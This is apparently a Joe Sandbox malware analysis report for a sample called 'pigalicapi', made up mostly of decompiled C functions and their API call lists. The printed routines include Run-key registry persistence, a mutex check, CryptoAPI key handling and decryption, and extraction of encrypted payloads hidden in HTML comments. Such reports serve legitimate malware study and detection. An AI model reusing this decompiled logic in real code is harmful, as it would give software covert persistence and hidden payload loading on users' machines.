Part of subcall function 024E8800: GetLastError.KERNEL32 ref: 024E8845
Part of subcall function 024E8800: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8874
Part of subcall function 024E8800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 024E88AF
Part of subcall function 024E8800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 024E88CF
Part of subcall function 024E8800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 024E890C
Part of subcall function 024E8800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 024E892A
Part of subcall function 024E8800: CryptDestroyKey.ADVAPI32(?), ref: 024E8937

Part of subcall function 024E87D0: QueryPerformanceCounter.KERNEL32(?), ref: 024E87E7

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
String ID:
API String ID: 487564122-0
Opcode ID: bd92bde5b14c6db3531a412ad1d71847bc9a56bb6da1ab003835ba6c2674e24e
Instruction ID: f6ffeca49ac53ca09de961c284440be98f9fe3026100d0bde27379b2993f1a1c
Opcode Fuzzy Hash: bd92bde5b14c6db3531a412ad1d71847bc9a56bb6da1ab003835ba6c2674e24e
Instruction Fuzzy Hash: FB715EB5D00208ABEF04DFA4DC85FEFB7B6AB48305F14851AFA15A7290EB709644CF61

Uniqueness

Uniqueness Score: -1.00%

Function 024E12D0 Relevance: 7.6, APIs: 5, Instructions: 57
registrysleepstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E12D0(CHAR* _a4) {
				CHAR* _v8;
				char* _v12;
				CHAR* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				long _t26;

				_v8 = _a4;
				if(_v8 != 0) {
					_v16 = _v8;
					_v12 = "software\\microsoft\\windows\\currentversion\\run";
					while( *0x24f4370 == 0) {
						_v20 = 0x80000001;
						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
							_v20 = 0x80000002;
						}
						_v24 = 0;
						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
						if(_t26 == 0) {
							_v28 = lstrlenA(_v16);
							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
							RegCloseKey(_v24); // executed
						}
						Sleep(0x1388); // executed
					}
				}
				return 0;
			}

0x024e12d9
0x024e12e0
0x024e12e9
0x024e12ec
0x024e12f3
0x024e1301
0x024e1314
0x024e1316
0x024e1316
0x024e131d
0x024e1337
0x024e133f
0x024e134b
0x024e1368
0x024e1372
0x024e1372
0x024e137d
0x024e137d
0x024e12fc
0x024e138d

APIs

RegOpenKeyExA.KERNEL32(80000001,024EC248,00000000,000F003F,00000000), ref: 024E1337
lstrlenA.KERNEL32(?), ref: 024E1345
RegSetValueExA.KERNELBASE(00000000,-00000208,00000000,00000001,?,?), ref: 024E1368
RegCloseKey.KERNEL32(00000000), ref: 024E1372
Sleep.KERNEL32(00001388), ref: 024E137D

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: CloseOpenSleepValuelstrlen
String ID:
API String ID: 3411147897-0
Opcode ID: ae38cfd0c12f981cd17525641b6b03b81e111234a789442061b4ebe663f7dd22
Instruction ID: ad0b714d4794116f7ed524f26da8e4266f3456065a6c1e0a7a40e8a97b8df0d4
Opcode Fuzzy Hash: ae38cfd0c12f981cd17525641b6b03b81e111234a789442061b4ebe663f7dd22
Instruction Fuzzy Hash: 70210070E40209EBEF04CFE4D949BAFB7B4BB44701F104559E605AB681D7B49E51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF9C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

memcpy.NTDLL ref: 0040CF7F
VirtualProtect.KERNEL32 ref: 0040CFC7
memcpy.NTDLL ref: 0040CFDD
VirtualProtect.KERNEL32 ref: 0040D007

Strings

@, xrefs: 0040CFB5

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: ProtectVirtualmemcpy
String ID: @
API String ID: 4237922067-2766056989
Opcode ID: 8db564d9ec81a64df9146292d569b296ad7d3bff1fbc65882943e8c813c52fae
Instruction ID: 6571a1a19d4867cb41af07d93aa71d0a9a5c92769b2966b0a7b26dbabfc254cc
Opcode Fuzzy Hash: 8db564d9ec81a64df9146292d569b296ad7d3bff1fbc65882943e8c813c52fae
Instruction Fuzzy Hash: 7A015EB5A05205AFDB10EFA9D58459EFBF1EF88354F50882AF998E7350D334A8448B46

Uniqueness

Uniqueness Score: -1.00%

Function 100021A0 Relevance: 6.2, APIs: 4, Instructions: 182COMMON

Download Yara Rule

APIs

IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
SetLastError.KERNEL32(0000007E), ref: 1000223B

Memory Dump Source

Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd

Similarity

API ID: ErrorHugeLastRead
String ID:
API String ID: 3239643929-0
Opcode ID: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
Instruction ID: c08fe1bd30c15a7bb6e8476d185febfb1ca0f6f7539b963f039c2b10503cc3e6
Opcode Fuzzy Hash: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
Instruction Fuzzy Hash: CB818574A00209EFDB04CF94C890B9EBBB5FF88354F248198E959AB355D774EE81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00412210 Relevance: 6.1, APIs: 4, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E00412210() {
				void* _v12;
				void* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v52;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t24;
				intOrPtr _t25;
				signed int _t27;
				char* _t31;
				signed int _t33;
				signed int _t38;
				void* _t39;
				void* _t44;
				void* _t46;
				intOrPtr* _t47;
				signed int _t48;
				void* _t50;
				signed int _t51;
				signed int _t52;
				signed int _t53;
				void* _t54;
				void* _t55;
				char* _t57;
				void* _t58;
				void* _t61;
				char** _t62;
				signed int* _t65;

				_t62 = _t61 - 0x10;
				_t24 = E004102F0(_t46, _t49, _t50, _t54, _t55);
				_t47 = _t24;
				if(_t24 == 0 || ( *(_t24 + 0x20) & 0x0000000c) != 0) {
					L4:
					return _t24;
				} else {
					_t25 =  *0x422438; // 0xa52790
					if(_t25 == 0) {
						_v20 = 0;
						_v24 = 4;
						 *_t62 = "_pthread_cancelling_shmem"; // executed
						_t24 = E00414330(__eflags); // executed
						 *0x422438 = _t24;
					}
					if( *_t24 != 0) {
						_t5 = _t47 + 0x1c; // 0x1c
						_t57 = _t5;
						 *_t62 = _t57;
						E00413FD0();
						_t27 =  *(_t47 + 0x20) & 0x000000ff;
						__eflags = _t27 & 0x00000003;
						if((_t27 & 0x00000003) == 0) {
							L8:
							 *_t62 = _t57;
							return E00413A00(_t49);
						} else {
							_t51 =  *(_t47 + 0x24);
							__eflags = _t51 & 0x00000001;
							if((_t51 & 0x00000001) == 0) {
								goto L8;
							} else {
								_t49 =  *(_t47 + 0x10);
								__eflags =  *(_t47 + 0x10);
								if( *(_t47 + 0x10) <= 0) {
									_t52 = _t51 & 0xfffffffe;
									 *(_t47 + 0x20) = _t27 & 0xfffffff3 | 0x00000004;
									_t31 =  *(_t47 + 0x18);
									 *(_t47 + 0x24) = _t52;
									__eflags = _t31;
									if(_t31 != 0) {
										 *_t62 = _t31;
										ResetEvent(??);
										_push(_t47);
									}
									 *_t62 = _t57;
									E00413A00(_t49);
									E00412120();
									_push(_t57);
									_push(_t47);
									_t65 = _t62 - 0x10;
									_t33 = _v24;
									__eflags = _t33;
									if(_t33 == 0) {
										E004102F0(_t47, _t49, _t52, _t54, _t57);
										goto L21;
									} else {
										 *_t65 = _t33;
										_t38 = E00415BD0();
										__eflags = _t52;
										if(_t52 <= 0) {
											__eflags = _t38 - 0xfffffffe;
											if(_t38 > 0xfffffffe) {
												goto L15;
											} else {
												_t48 = _t38;
												_t44 = E004102F0(_t48, _t49, _t52, _t54, _t57);
												__eflags = _t48;
												_t58 = _t44;
												if(_t48 != 0) {
													goto L16;
												} else {
													L21:
													E00412210();
													 *_t65 = 0;
													Sleep(??);
													E00412210();
													__eflags = 0;
													return 0;
												}
											}
										} else {
											L15:
											_t39 = E004102F0(_t47, _t49, _t52, _t54, _t57);
											_t48 = 0xffffffff;
											_t58 = _t39;
											L16:
											E00412210();
											_t53 =  *(_t58 + 0x18);
											__eflags = _t53;
											if(_t53 == 0) {
												 *_t65 = _t48;
												Sleep(??);
											} else {
												_v52 = _t48;
												 *_t65 = _t53;
												WaitForSingleObject(??, ??);
											}
											E00412210();
											__eflags = 0;
											return 0;
										}
									}
								} else {
									goto L8;
								}
							}
						}
					} else {
						goto L4;
					}
				}
			}

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 5639b4af11f651155d8ad3dbe47d35675580404db8ee259bd86cb2999d768e2e
Instruction ID: 03044a26b96f7e7b193780177aff1d621ad6876101750b721eb7a4098160cad1
Opcode Fuzzy Hash: 5639b4af11f651155d8ad3dbe47d35675580404db8ee259bd86cb2999d768e2e
Instruction Fuzzy Hash: C931E7716042048BDB10BFB996852DFBBA4EF04364F5406AEEC94C7241D7BCD9E0879B

Uniqueness

Uniqueness Score: -1.00%

Function 024E5E00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E5E00() {

				CreateMutexA(0, 0, "pigalicapi"); // executed
				return 0 | GetLastError() == 0x000000b7;
			}

0x024e5e0c
0x024e5e25

APIs

CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,024E3BEB), ref: 024E5E0C
GetLastError.KERNEL32(?,024E3BEB), ref: 024E5E12

Strings

pigalicapi, xrefs: 024E5E03

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: CreateErrorLastMutex
String ID: pigalicapi
API String ID: 1925916568-2184165135
Opcode ID: 5fb5f9302e326ea6b1345604a952967ec721570c79a9d3310e8d8e2abacac4f3
Instruction ID: f6d5f293c49776f0ccbb5888676768ef73dda7ff2fc13b04fa5227d37b42dbba
Opcode Fuzzy Hash: 5fb5f9302e326ea6b1345604a952967ec721570c79a9d3310e8d8e2abacac4f3
Instruction Fuzzy Hash: 17C08C362C4324ABFA081A61ED8BB497F888760E82F600822F20AC90C1898168908F17

Uniqueness

Uniqueness Score: -1.00%

Function 0040F4D0 Relevance: 4.8, APIs: 3, Instructions: 336COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 0040F544
memmove.MSVCRT ref: 0040F74A
malloc.MSVCRT ref: 0040F82B

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: mallocmemmoverealloc
String ID:
API String ID: 1823370115-0
Opcode ID: 7709683076d90ca535b78cad08b96f01a0e0988889cd0d9cf5be07c8e64d2818
Instruction ID: e81dcd2bf55d7575d62e3bdedaa82d3939f2d228369639f389b0d43c20e4441b
Opcode Fuzzy Hash: 7709683076d90ca535b78cad08b96f01a0e0988889cd0d9cf5be07c8e64d2818
Instruction Fuzzy Hash: 82E11CF0704301EFD724AF15D64071ABBE0AB84744F90C83ED8859B792D7B9988ADB5A

Uniqueness

Uniqueness Score: -1.00%

Function 024E8250 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E8250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v13;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _t48;
				intOrPtr _t51;
				intOrPtr _t58;
				char _t63;
				void* _t77;
				void* _t78;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
					_v12 = 0;
					_v20 = _a4;
					_v13 = 0;
					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
						_t48 = "<!--"; // 0x2d2d213c
						_v32 = _t48;
						_t63 =  *0x24ec700; // 0x0
						_v28 = _t63;
						_t51 = E024E7AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
						_t78 = _t77 + 0x10;
						_v24 = _t51;
						if(_v24 == 0) {
						} else {
							_v12 = _v24 - _a4;
							_t28 = _v12 + 4; // 0x4
							_v36 = StrStrA(_v20 + _t28, "-->");
							if(_v36 != 0) {
								_v44 = _v36 - _v24 - 4;
								_t58 = E024E8090(_v24 + 4, _v44, _a12, _a16); // executed
								_t77 = _t78 + 0x10;
								_v40 = _t58;
								if(_v40 > 0) {
									_v13 = 1;
									_v8 = _v40;
								}
								_v12 = _v12 + 4;
								continue;
							}
						}
						goto L16;
					}
				}
				L16:
				return _v8;
			}

0x024e8256
0x024e8261
0x024e8285
0x024e828f
0x024e8292
0x024e8296
0x024e82b1
0x024e82b6
0x024e82b9
0x024e82bf
0x024e82d6
0x024e82db
0x024e82de
0x024e82e5
0x024e82e7
0x024e82ed
0x024e82fb
0x024e8306
0x024e830d
0x024e8318
0x024e832e
0x024e8333
0x024e8336
0x024e833d
0x024e833f
0x024e8346
0x024e8346
0x024e834f
0x00000000
0x024e835a
0x024e830d
0x00000000
0x024e82e5
0x024e8296
0x024e835f
0x024e8365

APIs

StrStrA.SHLWAPI(00000004,-->), ref: 024E8300

Part of subcall function 024E8090: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E80D8

Strings

<!--, xrefs: 024E82B1
-->, xrefs: 024E82F0

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: AllocVirtual
String ID: -->$<!--
API String ID: 4275171209-1166897919
Opcode ID: fd80511e3003cfd02d885499a89bf7ce7d31a37cbfd14406a5041b5f57d2da5a
Instruction ID: c474136921913a2560c0133f6b9c04099c9cabaf4d55cecf75b1d07da768e2fc
Opcode Fuzzy Hash: fd80511e3003cfd02d885499a89bf7ce7d31a37cbfd14406a5041b5f57d2da5a
Instruction Fuzzy Hash: 0D316B74D00249EFEF04CFA8C584BEEBBB1EB48309F18895AD406B7351D3B59A84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 024EA400 Relevance: 4.6, APIs: 3, Instructions: 53
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024EA400(char* _a4, char* _a8, char* _a12, int _a16) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _t25;
				long _t27;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
					_v12 = 0x80000001;
					if(( *0x24f435a & 0x000000ff) != 0) {
						_v12 = 0x80000002;
					}
					_v16 = 0;
					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
					if(_t25 == 0) {
						_v20 = _a16;
						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
						if(_t27 == 0) {
							_v8 = _v20;
						}
						RegCloseKey(_v16); // executed
					}
				}
				return _v8;
			}

0x024ea406
0x024ea411
0x024ea429
0x024ea439
0x024ea43b
0x024ea43b
0x024ea442
0x024ea45c
0x024ea464
0x024ea469
0x024ea480
0x024ea488
0x024ea48d
0x024ea48d
0x024ea494
0x024ea494
0x024ea464
0x024ea4a0

APIs

RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,000F003F,00000000), ref: 024EA45C
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 024EA480
RegCloseKey.KERNEL32(00000000), ref: 024EA494

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: b17d9e64a024c605643990de9111e995a14a1395b49b5e4cea902058a3ab45f6
Instruction ID: 9e3c7a0b77ac4f877b860d5c99c2b50485340fb54251ffde19871c6b2bb1ce1a
Opcode Fuzzy Hash: b17d9e64a024c605643990de9111e995a14a1395b49b5e4cea902058a3ab45f6
Instruction Fuzzy Hash: 57112874A0021AEBEF15CF94C848BAFB7B4FF44305F00855AE9159B280D7B49A50CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDCC Relevance: 4.5, APIs: 3, Instructions: 28synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0040EBE0: GetAtomNameA.KERNEL32(?,?,0040DB50), ref: 0040EC03

free.MSVCRT ref: 0040EDA2
ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040EDAD
FindCloseChangeNotification.KERNEL32 ref: 0040EDB9
memset.NTDLL ref: 0040EDFC

Memory Dump Source

Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd

Similarity

API ID: AtomChangeCloseFindMutexNameNotificationReleasefreememset
String ID:
API String ID: 342251636-0
Opcode ID: 44162ba2f567e4785b2b797dfd594cafc1bf0faf778d2d143437323698a3bf36
Instruction ID: e0ba675913fac37eea7b8a293b535138c2be36a3a1ced07d229613690e4f81d1
Opcode Fuzzy Hash: 44162ba2f567e4785b2b797dfd594cafc1bf0faf778d2d143437323698a3bf36
Instruction Fuzzy Hash: 61F01C76A045158BCB10BF6698840BDF7F1FE44314B454C7EE996A3350D738A426CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 024E8090 Relevance: 3.9, APIs: 3, Instructions: 147
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E024E8090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
				long _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				int _v48;
				long _v52;
				void* _t71;
				intOrPtr _t73;
				void* _t91;
				void* _t93;

				_v8 = 0;
				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L13:
					return _v8;
				} else {
					_v16 = _a8;
					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
					_v12 = _t71;
					if(_v12 != 0) {
						_t73 = E024E1390(_v12, _a4, _v16, _v12, _v16); // executed
						_v20 = _t73;
						if(_v20 != 0) {
							_v24 = _v12;
							_v28 = _v20;
							_v32 = E024E87B0(_v20,  *_v24) & 0x0000ffff;
							if(_v32 == 0xa) {
								_v40 =  *((intOrPtr*)(_v24 + 4));
								_v44 =  *((intOrPtr*)(_v24 + 8));
								_v36 = E024E16F0(_v24 + 0xc, _v28 - 0xc);
								if(_v36 == _v44) {
									E024E8630(_v24 + 0xc, 4, _v40);
									_v48 =  *((intOrPtr*)(_v24 + 0xc));
									E024E8630(_v24 + 0x10, _v48, _v40);
									_v52 = _v28 - _v48 + 0x10;
									_t52 = _v48 + 0x10; // 0x10
									_t91 = E024E8A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48, 0x24f3410, 0x254); // executed
									if(_t91 != 0) {
										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
										 *_a12 = _t93;
										if( *_a12 != 0) {
											_t60 = _v48 + 0x10; // 0x10
											E024E7B70( *_a12, _v24 + _t60, _v52);
											 *_a16 = _v52;
											_v8 = _v52;
										}
									}
								}
							}
						}
						if(_v8 == 0) {
							VirtualFree(_v12, 0, 0x8000); // executed
						}
					}
					goto L13;
				}
			}

0x024e8096
0x024e80a1
0x024e8246
0x024e824c
0x024e80c5
0x024e80c8
0x024e80d8
0x024e80de
0x024e80e5
0x024e80fb
0x024e8103
0x024e810a
0x024e8113
0x024e8119
0x024e812d
0x024e8134
0x024e8140
0x024e8149
0x024e8162
0x024e816b
0x024e817e
0x024e818c
0x024e819e
0x024e81b1
0x024e81d3
0x024e81d8
0x024e81e2
0x024e81f1
0x024e81fa
0x024e8202
0x024e820e
0x024e8219
0x024e8227
0x024e822c
0x024e822c
0x024e8202
0x024e81e2
0x024e816b
0x024e8134
0x024e8233
0x024e8240
0x024e8240
0x024e8233
0x00000000
0x024e80e5

APIs

VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E80D8
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E8240

Part of subcall function 024E8A70: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E8AD3
Part of subcall function 024E8A70: GetLastError.KERNEL32 ref: 024E8ADD
Part of subcall function 024E8A70: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8B0C
Part of subcall function 024E8A70: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,00000000), ref: 024E8B37
Part of subcall function 024E8A70: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 024E8B5E
Part of subcall function 024E8A70: CryptDecrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000), ref: 024E8B7A
Part of subcall function 024E8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B87
Part of subcall function 024E8A70: CryptDestroyKey.ADVAPI32(00000000), ref: 024E8B91
Part of subcall function 024E8A70: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8B9D

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 024E81F1

Memory Dump Source

Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true

Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd

Similarity

API ID: Crypt$ContextVirtual$AcquireAllocDestroyImport$DecryptErrorFreeLastRelease
String ID:
API String ID: 142027497-0
Opcode ID: 8e7467fdcd52b0c20d4b4b6b13b7570243d339d6de203c1948f081693ef88157
Instruction ID: de3c2269aa04ffa70ca72aaa96b8a21e166da246dcfaf0223529a2dd2c24304a
Opcode Fuzzy Hash: 8e7467fdcd52b0c20d4b4b6b13b7570243d339d6de203c1948f081693ef88157
Instruction Fuzzy Hash: E05107B4E00209AFEF14DF98D984BAEB7B6BF48305F148559E905BB391D730AA40CF65

Uniqueness

Uniqueness Score: -1.00%

Function 024E5930 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E024E5930(intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v24;
				void _v52;
				intOrPtr _v56;
				signed int _v60;
				void* _t70;

				_v8 = 0;
				if(_a4 != 0 && _a8 != 0 && _a12 > 0 && _a12 <= 0x10) {
					E024E7B70( &_v24, _a4, 0x10);
					memcpy( &_v52, "abcdefghijklmnopqrstuvwxyz", 6 << 2);
					asm("movsw");
					asm("movsb");
